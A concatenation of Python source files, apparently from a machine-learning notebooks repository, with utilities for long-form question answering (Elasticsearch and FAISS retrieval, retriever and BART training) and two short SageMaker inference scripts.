 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: notebooks-main/longform-qa/lfqa_utils.py
2
+ import functools
3
+ import math
4
+ import os
5
+ from random import choice, randint
6
+ from time import time
7
+ import numpy as np
8
+ import torch
9
+ import torch.utils.checkpoint as checkpoint
10
+ from torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler
11
+ from tqdm import tqdm
12
+ import faiss
13
+ import nlp
14
+ import pandas as pd
15
+ from elasticsearch import Elasticsearch
16
+ from elasticsearch.helpers import bulk, streaming_bulk
17
+ from transformers import AdamW, AutoModel, AutoModelForSeq2SeqLM, AutoTokenizer, get_linear_schedule_with_warmup
18
+ pd.set_option('display.max_colwidth', None)
19
+
20
+ def make_es_index_snippets(es_client, passages_dset, index_name='english_wiki_kilt_snippets_100w'):
21
+ index_config = {'settings': {'number_of_shards': 1, 'analysis': {'analyzer': {'stop_standard': {'type': 'standard', ' stopwords': '_english_'}}}}, 'mappings': {'properties': {'article_title': {'type': 'text', 'analyzer': 'standard', 'similarity': 'BM25'}, 'section_title': {'type': 'text', 'analyzer': 'standard', 'similarity': 'BM25'}, 'passage_text': {'type': 'text', 'analyzer': 'standard', 'similarity': 'BM25'}}}}
22
+ es_client.indices.create(index=index_name, body=index_config)
23
+ number_of_docs = passages_dset.num_rows
24
+ progress = tqdm(unit='docs', total=number_of_docs)
25
+ successes = 0
26
+
27
+ def passage_generator():
28
+ for passage in passages_dset:
29
+ yield passage
30
+ for (ok, action) in streaming_bulk(client=es_client, index=index_name, actions=passage_generator()):
31
+ progress.update(1)
32
+ successes += ok
33
+ print('Indexed %d documents' % (successes,))
34
+
35
+ def query_es_index(question, es_client, index_name='english_wiki_kilt_snippets_100w', n_results=10, min_length=20):
36
+ q = question.lower()
37
+ banned = ['how', 'why', 'what', 'where', 'which', 'do', 'does', 'is', '?', 'eli5', 'eli5:']
38
+ q = ' '.join([w for w in q.split() if w not in banned])
39
+ response = es_client.search(index=index_name, body={'query': {'multi_match': {'query': q, 'fields': ['article_title', 'section_title', 'passage_text^2'], 'type': 'cross_fields'}}, 'size': 2 * n_results})
40
+ hits = response['hits']['hits']
41
+ support_doc = '<P> ' + ' <P> '.join([hit['_source']['passage_text'] for hit in hits])
42
+ res_list = [dict([(k, hit['_source'][k]) for k in hit['_source'] if k != 'passage_text']) for hit in hits]
43
+ for (r, hit) in zip(res_list, hits):
44
+ r['passage_id'] = hit['_id']
45
+ r['score'] = hit['_score']
46
+ r['passage_text'] = hit['_source']['passage_text']
47
+ res_list = [res for res in res_list if len(res['passage_text'].split()) > min_length][:n_results]
48
+ return (support_doc, res_list)
49
+
50
+ class ELI5DatasetQARetriver(Dataset):
51
+
52
+ def __init__(self, examples_array, extra_answer_threshold=3, min_answer_length=64, training=True, n_samples=None):
53
+ self.data = examples_array
54
+ self.answer_thres = extra_answer_threshold
55
+ self.min_length = min_answer_length
56
+ self.training = training
57
+ self.n_samples = self.data.num_rows if n_samples is None else n_samples
58
+
59
+ def __len__(self):
60
+ return self.n_samples
61
+
62
+ def make_example(self, idx):
63
+ example = self.data[idx]
64
+ question = example['title']
65
+ if self.training:
66
+ answers = [a for (i, (a, sc)) in enumerate(zip(example['answers']['text'], example['answers']['score']))]
67
+ answer_tab = choice(answers).split(' ')
68
+ start_idx = randint(0, max(0, len(answer_tab) - self.min_length))
69
+ answer_span = ' '.join(answer_tab[start_idx:])
70
+ else:
71
+ answer_span = example['answers']['text'][0]
72
+ return (question, answer_span)
73
+
74
+ def __getitem__(self, idx):
75
+ return self.make_example(idx % self.data.num_rows)
76
+
77
+ class RetrievalQAEmbedder(torch.nn.Module):
78
+
79
+ def __init__(self, sent_encoder, dim):
80
+ super(RetrievalQAEmbedder, self).__init__()
81
+ self.sent_encoder = sent_encoder
82
+ self.output_dim = 128
83
+ self.project_q = torch.nn.Linear(dim, self.output_dim, bias=False)
84
+ self.project_a = torch.nn.Linear(dim, self.output_dim, bias=False)
85
+ self.ce_loss = torch.nn.CrossEntropyLoss(reduction='mean')
86
+
87
+ def embed_sentences_checkpointed(self, input_ids, attention_mask, checkpoint_batch_size=-1):
88
+ if checkpoint_batch_size < 0 or input_ids.shape[0] < checkpoint_batch_size:
89
+ return self.sent_encoder(input_ids, attention_mask=attention_mask)[1]
90
+ else:
91
+ device = input_ids.device
92
+ input_shape = input_ids.size()
93
+ token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
94
+ head_mask = [None] * self.sent_encoder.config.num_hidden_layers
95
+ extended_attention_mask: torch.Tensor = self.sent_encoder.get_extended_attention_mask(attention_mask, input_shape, device)
96
+
97
+ def partial_encode(*inputs):
98
+ encoder_outputs = self.sent_encoder.encoder(inputs[0], attention_mask=inputs[1], head_mask=head_mask)
99
+ sequence_output = encoder_outputs[0]
100
+ pooled_output = self.sent_encoder.pooler(sequence_output)
101
+ return pooled_output
102
+ embedding_output = self.sent_encoder.embeddings(input_ids=input_ids, position_ids=None, token_type_ids=token_type_ids, inputs_embeds=None)
103
+ pooled_output_list = []
104
+ for b in range(math.ceil(input_ids.shape[0] / checkpoint_batch_size)):
105
+ b_embedding_output = embedding_output[b * checkpoint_batch_size:(b + 1) * checkpoint_batch_size]
106
+ b_attention_mask = extended_attention_mask[b * checkpoint_batch_size:(b + 1) * checkpoint_batch_size]
107
+ pooled_output = checkpoint.checkpoint(partial_encode, b_embedding_output, b_attention_mask)
108
+ pooled_output_list.append(pooled_output)
109
+ return torch.cat(pooled_output_list, dim=0)
110
+
111
+ def embed_questions(self, q_ids, q_mask, checkpoint_batch_size=-1):
112
+ q_reps = self.embed_sentences_checkpointed(q_ids, q_mask, checkpoint_batch_size)
113
+ return self.project_q(q_reps)
114
+
115
+ def embed_answers(self, a_ids, a_mask, checkpoint_batch_size=-1):
116
+ a_reps = self.embed_sentences_checkpointed(a_ids, a_mask, checkpoint_batch_size)
117
+ return self.project_a(a_reps)
118
+
119
+ def forward(self, q_ids, q_mask, a_ids, a_mask, checkpoint_batch_size=-1):
120
+ device = q_ids.device
121
+ q_reps = self.embed_questions(q_ids, q_mask, checkpoint_batch_size)
122
+ a_reps = self.embed_answers(a_ids, a_mask, checkpoint_batch_size)
123
+ compare_scores = torch.mm(q_reps, a_reps.t())
124
+ loss_qa = self.ce_loss(compare_scores, torch.arange(compare_scores.shape[1]).to(device))
125
+ loss_aq = self.ce_loss(compare_scores.t(), torch.arange(compare_scores.shape[0]).to(device))
126
+ loss = (loss_qa + loss_aq) / 2
127
+ return loss
128
+
129
+ def make_qa_retriever_model(model_name='google/bert_uncased_L-8_H-512_A-8', from_file=None, device='cuda:0'):
130
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
131
+ bert_model = AutoModel.from_pretrained(model_name).to(device)
132
+ d_ids = torch.LongTensor([[bert_model.config.bos_token_id if bert_model.config.bos_token_id is not None else 1]]).to(device)
133
+ d_mask = torch.LongTensor([[1]]).to(device)
134
+ sent_dim = bert_model(d_ids, attention_mask=d_mask)[1].shape[-1]
135
+ qa_embedder = RetrievalQAEmbedder(bert_model, sent_dim).to(device)
136
+ if from_file is not None:
137
+ param_dict = torch.load(from_file)
138
+ qa_embedder.load_state_dict(param_dict['model'])
139
+ return (tokenizer, qa_embedder)
140
+
141
+ def make_qa_retriever_batch(qa_list, tokenizer, max_len=64, device='cuda:0'):
142
+ q_ls = [q for (q, a) in qa_list]
143
+ a_ls = [a for (q, a) in qa_list]
144
+ q_toks = tokenizer.batch_encode_plus(q_ls, max_length=max_len, pad_to_max_length=True)
145
+ (q_ids, q_mask) = (torch.LongTensor(q_toks['input_ids']).to(device), torch.LongTensor(q_toks['attention_mask']).to(device))
146
+ a_toks = tokenizer.batch_encode_plus(a_ls, max_length=max_len, pad_to_max_length=True)
147
+ (a_ids, a_mask) = (torch.LongTensor(a_toks['input_ids']).to(device), torch.LongTensor(a_toks['attention_mask']).to(device))
148
+ return (q_ids, q_mask, a_ids, a_mask)
149
+
150
+ def train_qa_retriever_epoch(model, dataset, tokenizer, optimizer, scheduler, args, e=0):
151
+ model.train()
152
+ train_sampler = RandomSampler(dataset)
153
+ model_collate_fn = functools.partial(make_qa_retriever_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
154
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn)
155
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
156
+ loc_steps = 0
157
+ loc_loss = 0.0
158
+ st_time = time()
159
+ for (step, batch) in enumerate(epoch_iterator):
160
+ (q_ids, q_mask, a_ids, a_mask) = batch
161
+ pre_loss = model(q_ids, q_mask, a_ids, a_mask, checkpoint_batch_size=args.checkpoint_batch_size)
162
+ loss = pre_loss.sum()
163
+ loss.backward()
164
+ optimizer.step()
165
+ scheduler.step()
166
+ model.zero_grad()
167
+ loc_loss += loss.item()
168
+ loc_steps += 1
169
+ if step % args.print_freq == 0 or step == 1:
170
+ print('{:2d} {:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(e, step, len(dataset) // args.batch_size, loc_loss / loc_steps, time() - st_time))
171
+ loc_loss = 0
172
+ loc_steps = 0
173
+
174
+ def train_qa_retriever_joint_epoch(model, dataset_list, tokenizer, optimizer, scheduler, args, e=0):
175
+ model.train()
176
+ model_collate_fn = functools.partial(make_qa_retriever_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
177
+ train_samplers = [RandomSampler(dataset) for dataset in dataset_list]
178
+ data_loaders = [DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn) for (dataset, train_sampler) in zip(dataset_list, train_samplers)]
179
+ iterators = [iter(dloader) for dloader in data_loaders]
180
+ joint_iter = zip(*iterators)
181
+ loc_steps = 0
182
+ loc_loss = 0.0
183
+ st_time = time()
184
+ for (step, (batches,)) in enumerate(zip(joint_iter)):
185
+ for batch in batches:
186
+ (q_ids, q_mask, a_ids, a_mask) = batch
187
+ loss = model(q_ids, q_mask, a_ids, a_mask, checkpoint_batch_size=args.checkpoint_batch_size)
188
+ loss.backward()
189
+ optimizer.step()
190
+ scheduler.step()
191
+ model.zero_grad()
192
+ loc_loss += loss.item()
193
+ loc_steps += 1
194
+ if step % args.print_freq == 0:
195
+ print('{:2d} {:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(e, step, len(dataset_list[0]) // args.batch_size, loc_loss / loc_steps, time() - st_time))
196
+ loc_loss = 0
197
+ loc_steps = 0
198
+
199
+ def evaluate_qa_retriever(model, dataset, tokenizer, args):
200
+ model.eval()
201
+ eval_sampler = SequentialSampler(dataset)
202
+ model_collate_fn = functools.partial(make_qa_retriever_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
203
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=eval_sampler, collate_fn=model_collate_fn)
204
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
205
+ tot_loss = 0.0
206
+ with torch.no_grad():
207
+ for (step, batch) in enumerate(epoch_iterator):
208
+ (q_ids, q_mask, a_ids, a_mask) = batch
209
+ loss = model(q_ids, q_mask, a_ids, a_mask)
210
+ tot_loss += loss.item()
211
+ return tot_loss / (step + 1)
212
+
213
+ def train_qa_retriever(qar_model, qar_tokenizer, qar_train_dset, qar_valid_dset, qar_args):
214
+ qar_optimizer = AdamW(qar_model.parameters(), lr=qar_args.learning_rate, eps=1e-08)
215
+ qar_scheduler = get_linear_schedule_with_warmup(qar_optimizer, num_warmup_steps=100, num_training_steps=(qar_args.num_epochs + 1) * math.ceil(len(qar_train_dset) / qar_args.batch_size))
216
+ for e in range(qar_args.num_epochs):
217
+ train_qa_retriever_epoch(qar_model, qar_train_dset, qar_tokenizer, qar_optimizer, qar_scheduler, qar_args, e)
218
+ m_save_dict = {'model': qar_model.state_dict(), 'optimizer': qar_optimizer.state_dict(), 'scheduler': qar_scheduler.state_dict()}
219
+ print('Saving model {}'.format(qar_args.model_save_name))
220
+ torch.save(m_save_dict, '{}_{}.pth'.format(qar_args.model_save_name, e))
221
+ eval_loss = evaluate_qa_retriever(qar_model, qar_valid_dset, qar_tokenizer, qar_args)
222
+ print('Evaluation loss epoch {:4d}: {:.3f}'.format(e, eval_loss))
223
+
224
+ class ELI5DatasetS2S(Dataset):
225
+
226
+ def __init__(self, examples_array, make_doc_fun=None, extra_answer_threshold=3, document_cache=None, training=True):
227
+ self.training = training
228
+ self.data = examples_array
229
+ self.make_doc_function = make_doc_fun
230
+ self.document_cache = {} if document_cache is None else document_cache
231
+ assert not (make_doc_fun is None and document_cache is None)
232
+ if self.training:
233
+ self.qa_id_list = [(i, j) for (i, qa) in enumerate(self.data) for (j, (a, sc)) in enumerate(zip(qa['answers']['text'], qa['answers']['score'])) if j == 0 or sc >= extra_answer_threshold]
234
+ else:
235
+ self.qa_id_list = [(i, 0) for i in range(self.data.num_rows)]
236
+
237
+ def __len__(self):
238
+ return len(self.qa_id_list)
239
+
240
+ def make_example(self, idx):
241
+ (i, j) = self.qa_id_list[idx]
242
+ example = self.data[i]
243
+ question = example['title'] + ' ' + example['selftext']
244
+ answer = example['answers']['text'][j]
245
+ q_id = example['q_id']
246
+ if self.make_doc_function is not None:
247
+ self.document_cache[q_id] = self.document_cache.get(q_id, self.make_doc_function(example['title']))
248
+ document = self.document_cache[q_id]
249
+ in_st = 'question: {} context: {}'.format(question.lower().replace(' --t--', '').strip(), document.lower().strip())
250
+ out_st = answer
251
+ return (in_st, out_st)
252
+
253
+ def __getitem__(self, idx):
254
+ return self.make_example(idx)
255
+
256
+ def make_qa_s2s_model(model_name='facebook/bart-large', from_file=None, device='cuda:0'):
257
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
258
+ model = AutoModelForSeq2SeqLM.from_pretrained(model_name).to(device)
259
+ if from_file is not None:
260
+ param_dict = torch.load(from_file)
261
+ model.load_state_dict(param_dict['model'])
262
+ return (tokenizer, model)
263
+
264
+ def make_qa_s2s_batch(qa_list, tokenizer, max_len=64, max_a_len=360, device='cuda:0'):
265
+ q_ls = [q for (q, a) in qa_list]
266
+ a_ls = [a for (q, a) in qa_list]
267
+ q_toks = tokenizer.batch_encode_plus(q_ls, max_length=max_len, pad_to_max_length=True)
268
+ (q_ids, q_mask) = (torch.LongTensor(q_toks['input_ids']).to(device), torch.LongTensor(q_toks['attention_mask']).to(device))
269
+ a_toks = tokenizer.batch_encode_plus(a_ls, max_length=min(max_len, max_a_len), pad_to_max_length=True)
270
+ (a_ids, a_mask) = (torch.LongTensor(a_toks['input_ids']).to(device), torch.LongTensor(a_toks['attention_mask']).to(device))
271
+ lm_labels = a_ids[:, 1:].contiguous().clone()
272
+ lm_labels[a_mask[:, 1:].contiguous() == 0] = -100
273
+ model_inputs = {'input_ids': q_ids, 'attention_mask': q_mask, 'decoder_input_ids': a_ids[:, :-1].contiguous(), 'lm_labels': lm_labels}
274
+ return model_inputs
275
+
276
+ def train_qa_s2s_epoch(model, dataset, tokenizer, optimizer, scheduler, args, e=0, curriculum=False):
277
+ model.train()
278
+ if curriculum:
279
+ train_sampler = SequentialSampler(dataset)
280
+ else:
281
+ train_sampler = RandomSampler(dataset)
282
+ model_collate_fn = functools.partial(make_qa_s2s_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
283
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn)
284
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
285
+ loc_steps = 0
286
+ loc_loss = 0.0
287
+ st_time = time()
288
+ for (step, batch_inputs) in enumerate(epoch_iterator):
289
+ pre_loss = model(**batch_inputs)[0]
290
+ loss = pre_loss.sum() / pre_loss.shape[0]
291
+ loss.backward()
292
+ if step % args.backward_freq == 0:
293
+ optimizer.step()
294
+ scheduler.step()
295
+ model.zero_grad()
296
+ loc_loss += loss.item()
297
+ loc_steps += 1
298
+ if step % args.print_freq == 0 or step == 1:
299
+ print('{:2d} {:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(e, step, len(dataset) // args.batch_size, loc_loss / loc_steps, time() - st_time))
300
+ loc_loss = 0
301
+ loc_steps = 0
302
+
303
+ def eval_qa_s2s_epoch(model, dataset, tokenizer, args):
304
+ model.eval()
305
+ train_sampler = SequentialSampler(dataset)
306
+ model_collate_fn = functools.partial(make_qa_s2s_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
307
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn)
308
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
309
+ loc_steps = 0
310
+ loc_loss = 0.0
311
+ st_time = time()
312
+ with torch.no_grad():
313
+ for (step, batch_inputs) in enumerate(epoch_iterator):
314
+ pre_loss = model(**batch_inputs)[0]
315
+ loss = pre_loss.sum() / pre_loss.shape[0]
316
+ loc_loss += loss.item()
317
+ loc_steps += 1
318
+ if step % args.print_freq == 0:
319
+ print('{:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(step, len(dataset) // args.batch_size, loc_loss / loc_steps, time() - st_time))
320
+ print('Total \t L: {:.3f} \t -- {:.3f}'.format(loc_loss / loc_steps, time() - st_time))
321
+
322
+ def train_qa_s2s(qa_s2s_model, qa_s2s_tokenizer, s2s_train_dset, s2s_valid_dset, s2s_args):
323
+ s2s_optimizer = AdamW(qa_s2s_model.parameters(), lr=s2s_args.learning_rate, eps=1e-08)
324
+ s2s_scheduler = get_linear_schedule_with_warmup(s2s_optimizer, num_warmup_steps=400, num_training_steps=(s2s_args.num_epochs + 1) * math.ceil(len(s2s_train_dset) / s2s_args.batch_size))
325
+ for e in range(s2s_args.num_epochs):
326
+ train_qa_s2s_epoch(qa_s2s_model, s2s_train_dset, qa_s2s_tokenizer, s2s_optimizer, s2s_scheduler, s2s_args, e, curriculum=e == 0)
327
+ m_save_dict = {'model': qa_s2s_model.state_dict(), 'optimizer': s2s_optimizer.state_dict(), 'scheduler': s2s_scheduler.state_dict()}
328
+ print('Saving model {}'.format(s2s_args.model_save_name))
329
+ eval_qa_s2s_epoch(qa_s2s_model, s2s_valid_dset, qa_s2s_tokenizer, s2s_args)
330
+ torch.save(m_save_dict, '{}_{}.pth'.format(s2s_args.model_save_name, e))
331
+
332
+ def qa_s2s_generate(question_doc, qa_s2s_model, qa_s2s_tokenizer, num_answers=1, num_beams=None, min_len=64, max_len=256, do_sample=False, temp=1.0, top_p=None, top_k=None, max_input_length=512, device='cuda:0'):
333
+ model_inputs = make_qa_s2s_batch([(question_doc, 'A')], qa_s2s_tokenizer, max_input_length, device=device)
334
+ n_beams = num_answers if num_beams is None else max(num_beams, num_answers)
335
+ generated_ids = qa_s2s_model.generate(input_ids=model_inputs['input_ids'], attention_mask=model_inputs['attention_mask'], min_length=min_len, max_length=max_len, do_sample=do_sample, early_stopping=True, num_beams=1 if do_sample else n_beams, temperature=temp, top_k=top_k, top_p=top_p, eos_token_id=qa_s2s_tokenizer.eos_token_id, no_repeat_ngram_size=3, num_return_sequences=num_answers, decoder_start_token_id=qa_s2s_tokenizer.bos_token_id)
336
+ return [qa_s2s_tokenizer.decode(ans_ids, skip_special_tokens=True).strip() for ans_ids in generated_ids]
337
+
338
+ def embed_passages_for_retrieval(passages, tokenizer, qa_embedder, max_length=128, device='cuda:0'):
339
+ a_toks = tokenizer.batch_encode_plus(passages, max_length=max_length, pad_to_max_length=True)
340
+ (a_ids, a_mask) = (torch.LongTensor(a_toks['input_ids']).to(device), torch.LongTensor(a_toks['attention_mask']).to(device))
341
+ with torch.no_grad():
342
+ a_reps = qa_embedder.embed_answers(a_ids, a_mask).cpu().type(torch.float)
343
+ return a_reps.numpy()
344
+
345
+ def embed_questions_for_retrieval(q_ls, tokenizer, qa_embedder, device='cuda:0'):
346
+ q_toks = tokenizer.batch_encode_plus(q_ls, max_length=128, pad_to_max_length=True)
347
+ (q_ids, q_mask) = (torch.LongTensor(q_toks['input_ids']).to(device), torch.LongTensor(q_toks['attention_mask']).to(device))
348
+ with torch.no_grad():
349
+ q_reps = qa_embedder.embed_questions(q_ids, q_mask).cpu().type(torch.float)
350
+ return q_reps.numpy()
351
+
352
+ def make_qa_dense_index(qa_embedder, tokenizer, passages_dset, batch_size=512, max_length=128, index_name='kilt_passages_reps.dat', dtype='float32', device='cuda:0'):
353
+ st_time = time()
354
+ fp = np.memmap(index_name, dtype=dtype, mode='w+', shape=(passages_dset.num_rows, 128))
355
+ n_batches = math.ceil(passages_dset.num_rows / batch_size)
356
+ for i in range(n_batches):
357
+ passages = [p for p in passages_dset[i * batch_size:(i + 1) * batch_size]['passage_text']]
358
+ reps = embed_passages_for_retrieval(passages, tokenizer, qa_embedder, max_length, device)
359
+ fp[i * batch_size:(i + 1) * batch_size] = reps
360
+ if i % 50 == 0:
361
+ print(i, time() - st_time)
362
+
363
+ def evaluate_retriever(qa_list, retriever_func, scoring_func, n_ret=10, verbose=False):
364
+ total_retriever_time = 0.0
365
+ total_retriever_score = 0.0
366
+ st_time = time()
367
+ for (i, (question, answer)) in enumerate(qa_list):
368
+ r_time = time()
369
+ retrieved_passages = retriever_func(question, n_ret)
370
+ total_retriever_time += time() - r_time
371
+ total_retriever_score += scoring_func(retrieved_passages, answer)
372
+ if verbose and ((i + 1) % 500 == 0 or i <= 1):
373
+ print('{:03d}: S-{:.4f} T-{:.4f} | {:.2f}'.format(i + 1, total_retriever_score / (i + 1), total_retriever_time / (i + 1), time() - st_time))
374
+ return {'idf_recall': total_retriever_score / (i + 1), 'retrieval_time': total_retriever_time / (i + 1)}
375
+
376
+ def query_qa_dense_index(question, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10, min_length=20, device='cuda:0'):
377
+ q_rep = embed_questions_for_retrieval([question], tokenizer, qa_embedder, device=device)
378
+ (D, I) = wiki_index.search(q_rep, 2 * n_results)
379
+ res_passages = [wiki_passages[int(i)] for i in I[0]]
380
+ support_doc = '<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages])
381
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
382
+ res_list = [res for res in res_list if len(res['passage_text'].split()) > min_length][:n_results]
383
+ for (r, sc) in zip(res_list, D[0]):
384
+ r['score'] = float(sc)
385
+ return (support_doc, res_list)
386
+
387
+ def batch_query_qa_dense_index(questions, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10):
388
+ q_rep = embed_questions_for_retrieval(questions, tokenizer, qa_embedder)
389
+ (D, I) = wiki_index.search(q_rep, n_results)
390
+ res_passages_lst = [[wiki_passages[int(i)] for i in i_lst] for i_lst in I]
391
+ support_doc_lst = ['<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages]) for res_passages in res_passages_lst]
392
+ all_res_lists = []
393
+ for (res_passages, dl) in zip(res_passages_lst, D):
394
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
395
+ for (r, sc) in zip(res_list, dl):
396
+ r['score'] = float(sc)
397
+ all_res_lists += [res_list[:]]
398
+ return (support_doc_lst, all_res_lists)
399
+
400
+ def query_qa_dense_index_nn(passage, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10, min_length=20):
401
+ a_rep = embed_passages_for_retrieval([passage], tokenizer, qa_embedder)
402
+ (D, I) = wiki_index.search(a_rep, 2 * n_results)
403
+ res_passages = [wiki_passages[int(i)] for i in I[0]]
404
+ support_doc = '<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages])
405
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
406
+ res_list = [res for res in res_list if len(res['passage_text'].split()) > min_length][:n_results]
407
+ for (r, sc, i) in zip(res_list, D[0], I[0]):
408
+ r['passage_id'] = int(i)
409
+ r['score'] = float(sc)
410
+ return (support_doc, res_list)
411
+
412
+ def batch_query_qa_dense_index_nn(passages, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10):
413
+ a_reps = embed_passages_for_retrieval(passages, tokenizer, qa_embedder)
414
+ (D, I) = wiki_index.search(a_reps, n_results)
415
+ res_passages_lst = [[wiki_passages[int(i)] for i in i_lst] for i_lst in I]
416
+ support_doc_lst = ['<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages]) for res_passages in res_passages_lst]
417
+ all_res_lists = []
418
+ for (res_passages, dl, il) in zip(res_passages_lst, D, I):
419
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
420
+ for (r, sc, i) in zip(res_list, dl, il):
421
+ r['passage_id'] = int(i)
422
+ r['score'] = float(sc)
423
+ all_res_lists += [res_list[:]]
424
+ return (support_doc_lst, all_res_lists)
425
+
426
+ # File: notebooks-main/sagemaker/17_custom_inference_script/code/inference.py
427
+ from transformers import AutoTokenizer, AutoModel
428
+ import torch
429
+ import torch.nn.functional as F
430
+
431
+ def mean_pooling(model_output, attention_mask):
432
+ token_embeddings = model_output[0]
433
+ input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
434
+ return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-09)
435
+
436
+ def model_fn(model_dir):
437
+ tokenizer = AutoTokenizer.from_pretrained(model_dir)
438
+ model = AutoModel.from_pretrained(model_dir)
439
+ return (model, tokenizer)
440
+
441
+ def predict_fn(data, model_and_tokenizer):
442
+ (model, tokenizer) = model_and_tokenizer
443
+ sentences = data.pop('inputs', data)
444
+ encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
445
+ with torch.no_grad():
446
+ model_output = model(**encoded_input)
447
+ sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
448
+ sentence_embeddings = F.normalize(sentence_embeddings, p=2, dim=1)
449
+ return {'vectors': sentence_embeddings}
450
+
451
+ # File: notebooks-main/sagemaker/18_inferentia_inference/code/inference.py
452
+ import os
453
+ from transformers import AutoConfig, AutoTokenizer
454
+ import torch
455
+ import torch.neuron
456
+ os.environ['NEURON_RT_NUM_CORES'] = '1'
457
+ AWS_NEURON_TRACED_WEIGHTS_NAME = 'neuron_model.pt'
458
+
459
+ def model_fn(model_dir):
460
+ tokenizer = AutoTokenizer.from_pretrained(model_dir)
461
+ model = torch.jit.load(os.path.join(model_dir, AWS_NEURON_TRACED_WEIGHTS_NAME))
462
+ model_config = AutoConfig.from_pretrained(model_dir)
463
+ return (model, tokenizer, model_config)
464
+
465
+ def predict_fn(data, model_tokenizer_model_config):
466
+ (model, tokenizer, model_config) = model_tokenizer_model_config
467
+ inputs = data.pop('inputs', data)
468
+ embeddings = tokenizer(inputs, return_tensors='pt', max_length=model_config.traced_sequence_length, padding='max_length', truncation=True)
469
+ neuron_inputs = tuple(embeddings.values())
470
+ with torch.no_grad():
471
+ predictions = model(*neuron_inputs)[0]
472
+ scores = torch.nn.Softmax(dim=1)(predictions)
473
+ return [{'label': model_config.id2label[item.argmax().item()], 'score': item.max().item()} for item in scores]
474
+
475
+ # File: notebooks-main/sagemaker/22_accelerate_sagemaker_examples/src/seq2seq/run_seq2seq_no_trainer.py
476
+ """"""
